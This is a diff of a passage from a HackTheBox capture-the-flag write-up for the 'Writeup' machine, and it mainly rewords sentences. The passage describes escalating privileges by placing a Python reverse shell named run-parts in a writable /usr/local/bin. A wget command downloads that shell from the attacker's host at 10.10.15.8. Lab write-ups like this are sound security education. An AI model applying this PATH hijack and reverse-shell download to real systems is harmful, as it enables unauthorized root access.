CorvidAeon/HackTheBox/writeup.md

 jkr@writeup:~$ groups
 jkr cdrom floppy audio dip video plugdev staff netdev
 </pre>
-So our user has no read permissions to /usr/local/bin but we have write permissions so we can just drop a script from our host machine in and have that be run first because of its order in the PATH (since other users were on the box /usr/local/bin was changed less often than sbin so I decided to go through there).
+So our user has no read permissions to /usr/local/bin, but we have write permissions.
+Due to this we can just drop a script from our host machine in and have that be run first because of its order in the PATH (since other users were on the box /usr/local/bin was changed less often than sbin so I decided to go through there).

-We need a script to run instead of run-parts, thankfully I already have a python reverse shell on my attacking machine and I rename that to run-parts and start up a web server to transfer it.
+We need a script to run instead of run-parts.
+Thankfully I already have a python reverse shell on my attacking machine and I rename that to run-parts.
+To transfer it, I start up a web server.
 Grab it and save it to one of the first folders listed in the PATH.
 The code is listed at the bottom of the next block.
 <pre>jkr@writeup:/usr/local/bin$ wget 10.10.15.8:8000/run-parts
 --2019-10-11 22:17:17--  http://10.10.15.8:8000/run-parts
 Connecting to 10.10.15.8:8000... connected.